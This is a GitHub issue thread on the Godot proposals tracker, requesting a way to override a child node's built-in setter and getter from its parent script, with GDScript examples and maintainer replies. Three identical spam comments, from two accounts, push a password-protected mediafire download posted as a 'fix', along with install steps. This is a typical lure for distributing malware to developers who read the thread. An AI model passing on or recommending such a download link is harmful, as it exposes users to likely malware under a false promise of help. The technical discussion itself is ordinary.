### ISSUE TITLE
Add ability to overwrite built-in set-get in own parent script

### ISSUE THREAD

**Issue by DexterFstone** [godotengine/godot-proposals#10615]
### Describe the project you are working on

a 2D RTS Game

### Describe the problem or limitation you are having in your project

Sometimes I want to overwrite the set-get of a node, but it requires an attached script.
For example, I have a CharacterBody2D, and a Srpite2D as a child, and I want to overwrite the `set_texture` method of Sprite2D of That scene, now I need to create a new script for Sprite2D and overwrite that method.

```gdscript
extends Sprite2D

func set_texture(value: Texture):
    pass

### Describe the feature / enhancement and how it helps to overcome the problem or limitation

Based on the above example, we need some ability to overwrite nodes set-get in its parent script, it's makes the project cleaner and makes coding easier. and no need for extra scripts

### Describe how your proposal will work, with code, pseudo-code, mock-ups, and/or diagrams

```gdscript
extends CharacterBody2D

var sprite_2d: Sprite2D = $Sprite2D

func Sprite2D_set_texture(value: Texture):
    pass
# or
func sprite_2d_set_texture(value: Texture):
    pass
```
now with this method, we can overwrite the `set_texture` method, or add a new annotation called `@overwrite(Node, Method)` for better result

```gdscript
extends CharacterBody2D

var sprite_2d: Sprite2D = $Sprite2D

@overwrite(sprite_2d, "set_texture")
func sprite_2d_set_texture(value: Texture):
    pass
```

### If this enhancement will not be used often, can it be worked around with a few lines of script?

yes, but we need a new script for each unique node

### Is there a reason why this should be core and not an add-on in the asset library?

I doubt it is possible

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by dalexeev** [comment]
> I want to overwrite the `set_texture` method of Sprite2D

Non-virtual native (built-in) methods are not overridable, including native setters and getters (but you can use `_set()` and `_get()` with `@tool`, it works for the Inspector). See the warning at the end of [GDScript - Inheritance](https://docs.godotengine.org/en/stable/tutorials/scripting/gdscript/gdscript_basics.html#inheritance) section for details.

**Comment by DexterFstone** [comment]
> > I want to overwrite the `set_texture` method of Sprite2D
> 
> Non-virtual native (built-in) methods are not overridable, including native setters and getters (but you can use `_set()` and `_get()` with `@tool`, it works for the Inspector). See the warning at the end of [GDScript Reference - Inheritance](https://docs.godotengine.org/en/stable/tutorials/scripting/gdscript/gdscript_basics.html#inheritance) section for details.

how about a custom class setter and getter?
ability to overwrite it from the parent script

**Comment by dalexeev** [comment]
> how about a custom class setter and getter?
> ability to overwrite it from the parent script

* See #8045.

**Comment by DexterFstone** [comment]
> > how about a custom class setter and getter?
> > ability to overwrite it from the parent script
> 
> * See [Allow overriding getters/setters in gdscript #8045](https://github.com/godotengine/godot-proposals/issues/8045).

No, this is not what I want
```gdscript
class_name Character
extends CharacterBody2D

var custom_sprite_2d = $CustomSprite2D

@overwrite(custom_sprite_2d , "set_data")
func custom_sprite_2d_set_data(value: int):
    data = value
    # Do something more with data just for this class
```

```gdscript
class_name CustomSprite2D
extends Sprite2D

var data: int:
    set = set_data,
    get = get_data

func set_data(value: int):
    data = value

func get_data() -> int:
    return data
```
